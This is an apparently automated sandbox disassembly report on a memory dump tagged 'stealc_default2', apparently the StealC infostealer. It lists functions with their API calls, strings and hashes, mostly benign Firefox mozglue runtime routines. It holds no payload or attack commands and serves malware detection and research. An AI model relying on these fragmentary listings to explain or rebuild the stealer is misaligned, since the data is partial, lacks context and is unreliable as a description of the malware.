memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6BF65820,?), ref: 6BF9D280

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: 4746a5ca589742f9a3013fdaaaa0e8ad472a4e96bdff3d36e0de5b6d5c61c9d4
Instruction ID: ae5831345e3ae705f370dc752bf5aa016e261cf355ebebb446cf7d06c16e2fc5
Opcode Fuzzy Hash: 4746a5ca589742f9a3013fdaaaa0e8ad472a4e96bdff3d36e0de5b6d5c61c9d4
Instruction Fuzzy Hash: A331F87B9402169BDB00DF68D880A6EBB75EF8A744F3440A9D954AB311D37AE802C7E1

Function 6BF6C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6BF6C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BF6C1DC

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 68db8303603e3cc4eb078b2f60d42493295e7b6adde01c04feb081d3d180ba3f
Instruction ID: 48a697b693626a61c867de28261ff4be407e26e755dc01b8c3caec2dd634366b
Opcode Fuzzy Hash: 68db8303603e3cc4eb078b2f60d42493295e7b6adde01c04feb081d3d180ba3f
Instruction Fuzzy Hash: 2941A1B2D183418FD710CF68D48175AB7E4BF86744F4589AEED889B222F738D548CB92

Function 6BF54310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6BF542D2), ref: 6BF5436A

Part of subcall function 6BF6CA10: malloc.MOZGLUE(?), ref: 6BF6CA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6BF542D2), ref: 6BF54387
moz_xmalloc.MOZGLUE(80000023,?,6BF542D2), ref: 6BF543B7
free.MOZGLUE(00000000,?,6BF542D2), ref: 6BF543EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BF542D2), ref: 6BF54406

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: b0469044b1c8856a7c5f4278c230415d9d08cf76cdb542ea74d0ea7bcd07c0c9
Instruction ID: 3a01f589ca9949ce556135042d147294483876151864176ee8e984607bccec9e
Opcode Fuzzy Hash: b0469044b1c8856a7c5f4278c230415d9d08cf76cdb542ea74d0ea7bcd07c0c9
Instruction Fuzzy Hash: FD313673A001158FD714DE799C9056EB7A6EF60260B100A39E865CB7F9EB34E93083A2

Function 6BFB0B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BFB0BBC

Part of subcall function 6BF75C50: GetTickCount64.KERNEL32 ref: 6BF75D40
Part of subcall function 6BF75C50: EnterCriticalSection.KERNEL32(6BFDF688), ref: 6BF75D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BFB0BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BFB0BD5

Part of subcall function 6BF75C50: __aulldiv.LIBCMT ref: 6BF75DB4
Part of subcall function 6BF75C50: LeaveCriticalSection.KERNEL32(6BFDF688), ref: 6BF75DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BFB0BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BFB0C9A

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: 46b00c58a642170edd212ef4e24dc7d85b07fb1afe7c2daa920a8738f2077ac9
Instruction ID: ce8e4607c154052abb3a30d7ed6f1ad0aa6e0e72cefffac256b7b55137d36c23
Opcode Fuzzy Hash: 46b00c58a642170edd212ef4e24dc7d85b07fb1afe7c2daa920a8738f2077ac9
Instruction Fuzzy Hash: 2E31F5729147158AC714DF39889051BB7E8EF82760F104B1EF8A5A32E0EB74D8448B92

Function 6BF66390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BF663D0
AcquireSRWLockExclusive.KERNEL32 ref: 6BF663DF
ReleaseSRWLockExclusive.KERNEL32 ref: 6BF6640E
__Init_thread_footer.LIBCMT ref: 6BF66467
??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BF664A8

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: 88635612b1e43dd12940b57f8b7ff703bfa061775bf2a768ea5b0520f6954ef7
Instruction ID: 855974e2dd2f90ba736be62d7542484cfb1c288d4c251cde2072a19ef2784c5f
Opcode Fuzzy Hash: 88635612b1e43dd12940b57f8b7ff703bfa061775bf2a768ea5b0520f6954ef7
Instruction Fuzzy Hash: 4C315AB2514241DFDB40DF78D085B9ABBF0EB86358F15891DE89583371D7389488CB53

Function 6BFB9B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BFB9B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BFB9BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6BFB9BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6BFB9BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6BFB9BE0

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: ef1f72e7103b03863fafa738be62be025b1bb2453dd6d263987c1d56a5a2abfd
Instruction ID: 9ec7e9baa73566b63aad578bd6a0d0a937b15a65567bdd2bc485da923322afaf
Opcode Fuzzy Hash: ef1f72e7103b03863fafa738be62be025b1bb2453dd6d263987c1d56a5a2abfd
Instruction Fuzzy Hash: CD117033914349A78B009F798C5189BB7B8FFD6264F00CA0DF99546161DF359658C7A2

Function 6BFBB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6BFBB0A6,6BFBB0A6,?,6BFBAF67,?,00000010,?,6BFBAF67,?,00000010,00000000,?,?,6BFBAB1F), ref: 6BFBB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6BFBB0A6,6BFBB0A6,?,6BFBAF67,?,00000010,?,6BFBAF67,?,00000010,00000000,?), ref: 6BFBB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6BFBB0A6,6BFBB0A6,?,6BFBAF67,?,00000010,?,6BFBAF67,?,00000010), ref: 6BFBB25F

Strings

map/set<T> too long, xrefs: 6BFBB1FA

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 67dfdf8ce75e6b8b7f4b1a68d5f55d6c5bf60b7a87e07bf8c6415705630bc7d5
Instruction ID: fecab3fc0a0f26187bc5c8b4f392735da11a808ed9b1f5759b8e34325ad90cf0
Opcode Fuzzy Hash: 67dfdf8ce75e6b8b7f4b1a68d5f55d6c5bf60b7a87e07bf8c6415705630bc7d5
Instruction Fuzzy Hash: F3615B76A042459FD701CF2AC8C4A9ABBF1FF4A314F18C9A9D8594B362C379EC41CB91

Function 6BF5F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6BFCD020), ref: 6BF5F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6BF5F132

Strings

SHGetKnownFolderPath, xrefs: 6BF5F12C
shell32, xrefs: 6BF5F11D

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 504a8ce9795dd0c792ad34387722ea19caeaf2aaeaf2003fe1a77c91129eeb1b
Instruction ID: bc5ffa8a99cf0746693bec22629b03658f5dd5f20e320e36a478c15eb7ad6f93
Opcode Fuzzy Hash: 504a8ce9795dd0c792ad34387722ea19caeaf2aaeaf2003fe1a77c91129eeb1b
Instruction Fuzzy Hash: 360171726102159FCF408F79DC58B5B7BB8FF8A751B400459E949D7220DB34EA14CBA0

Function 6BF8CBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,6BF531A7), ref: 6BF8CBF1
TerminateProcess.KERNEL32(00000000,00000003,?,6BF531A7), ref: 6BF8CBFA

Strings

: (malloc) Error in VirtualFree(), xrefs: 6BF8D001
<jemalloc>, xrefs: 6BF8CFFC

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: c1499c7d1a7cac451934d4d823513e216ba79dcfada87a11841d83fa7dbf0e6e
Instruction ID: 8086e31b90c19bd36759465cf8cbed1673e90b87af5ed69b441c19afa4ea8842
Opcode Fuzzy Hash: c1499c7d1a7cac451934d4d823513e216ba79dcfada87a11841d83fa7dbf0e6e
Instruction Fuzzy Hash: 5DB092714243089BDB102FB4D80DB093B6CB789A01F000C2CA20182262CBB9E1048E61

Function 6BF62272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BF6237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 6BF62B9C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: bfe561b3db7e42a847e31dbbfb925227d61eeab0f4e35c22221f4ac7b73c1730
Instruction ID: 2806ed116b33c967e9d9cf99eeffe50a01190bc342c9b818dd9a6a6bdbda2d56
Opcode Fuzzy Hash: bfe561b3db7e42a847e31dbbfb925227d61eeab0f4e35c22221f4ac7b73c1730
Instruction Fuzzy Hash: C4E16172A002068FDB18CF58C490A9EBBB2FF88354F1581ADDD059B355E776EC85CB90

Function 6BFA9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6BFA8242,?,00000000,?,6BF9B63F), ref: 6BFA9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BFA8242,?,00000000,?,6BF9B63F), ref: 6BFA91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6BFA8242,?,00000000,?,6BF9B63F), ref: 6BFA91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BFA8242,?,00000000,?,6BF9B63F), ref: 6BFA9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BFA8242,?,00000000,?,6BF9B63F), ref: 6BFA9219

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: b3c754672f63751960f636af82a6814cf439ca84cd6d7a3954c023802183615c
Instruction ID: fe0e9828a98fdbac1246d33f25001625863d13f8e813c7ddd4e77b6395df8b7a
Opcode Fuzzy Hash: b3c754672f63751960f636af82a6814cf439ca84cd6d7a3954c023802183615c
Instruction Fuzzy Hash: 1C310033A006058BEB04CF7CDC4876A77E9EF81200F418A79D856D7261EF36E858CBA1

Function 6BFB7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6BFB7250
EnterCriticalSection.KERNEL32(6BFDF688), ref: 6BFB7277
__aulldiv.LIBCMT ref: 6BFB72C4
LeaveCriticalSection.KERNEL32(6BFDF688), ref: 6BFB72F7

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 6fe97bb251914d23d5262cbbf47b6cd95f72b52a900f7d41a82db333b99a1dbb
Instruction ID: 88f844f58d62b0265edbdd3cde4d54ab9e7c7be389d5f6750fbc6445a2cef9a7
Opcode Fuzzy Hash: 6fe97bb251914d23d5262cbbf47b6cd95f72b52a900f7d41a82db333b99a1dbb
Instruction Fuzzy Hash: 8E513F72E101298FCF08CFB9C851BAEB7B1FB89304F19861DD815A7B61C735A945CB90

Function 6BF9E390 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BF9E3E4
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6BF9E4AB

Part of subcall function 6BF65D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6BF9D2DA,00000001), ref: 6BF65D66

ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E4F5
GetCurrentThreadId.KERNEL32 ref: 6BF9E577
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E584
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9E5DE
memset.VCRUNTIME140(?,00000000,00000000), ref: 6BF9E6DA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF9E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF9E883
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BF9E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6BF9E826, 6BF9E850
MOZ_PROFILER_STARTUP, xrefs: 6BF9E5A1, 6BF9E5CC, 6BF9E5FF, 6BF9E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6BF9E655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6BF9E777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6BF9E722, 6BF9E750, 6BF9E7A2

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 905598890-53385798
Opcode ID: ae107947d76c3061ef7ce2576e7d91c73f940b646ac53bb8a78a6cf94fc977df
Instruction ID: c2d65624a25b0d2337f83104cfa94952ca3e6ee71142d2b1f58bc24fe0a9caed
Opcode Fuzzy Hash: ae107947d76c3061ef7ce2576e7d91c73f940b646ac53bb8a78a6cf94fc977df
Instruction Fuzzy Hash: AC41AD76A10606CFDB14DF2CD480BAABBB1FF4A304F04456DD8569B7A1D738E858CB90

Function 6BFADAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BFADB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BFADC0E
free.MOZGLUE(?), ref: 6BFADC2E
free.MOZGLUE(?), ref: 6BFADC40

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: 5b6688a7838753e2fc4b168dadf40454e2175472750a16c56888cd35ab2cbbde
Instruction ID: 3c89338eb5e37d511ce3af7c11e5d0d3cf7568ba1787cb7e7318ab9d9b0aa327
Opcode Fuzzy Hash: 5b6688a7838753e2fc4b168dadf40454e2175472750a16c56888cd35ab2cbbde
Instruction Fuzzy Hash: 5E41797A6007018FC714CF34C088B5ABBF6BF88354F44886DE89A87361EB39E845CB51

Function 6BFAA2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6BFAA315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6BFAA31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6BFAA36A

Part of subcall function 6BF75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BF75EDB
Part of subcall function 6BF75E90: memset.VCRUNTIME140(6BFB7765,000000E5,55CCCCCC), ref: 6BF75F27
Part of subcall function 6BF75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BF75FB2

Part of subcall function 6BFA2140: free.MOZGLUE(?,00000060,?,6BFA7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BFA215D

free.MOZGLUE(00000000), ref: 6BFAA37C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: 37db2843d207131c4a4d51d0140b654bb8049d5c4811e317d631b5116f70900f
Instruction ID: 6bcebef8b44d6abb7b02c850a97085d5d07adc963fe40e684a2f71115d00d1b8
Opcode Fuzzy Hash: 37db2843d207131c4a4d51d0140b654bb8049d5c4811e317d631b5116f70900f
Instruction Fuzzy Hash: 7321D373A00225DBCB15AB2AD400B5FBBE9EF85714F044065D9095B320D73AED16C6D2

Function 6BF75B50 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6BF756EE,?,00000001), ref: 6BF75B85
EnterCriticalSection.KERNEL32(6BFDF688,?,?,?,6BF756EE,?,00000001), ref: 6BF75B90
LeaveCriticalSection.KERNEL32(6BFDF688,?,?,?,6BF756EE,?,00000001), ref: 6BF75BD8
GetTickCount64.KERNEL32 ref: 6BF75BE4

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID:
API String ID: 2796706680-0
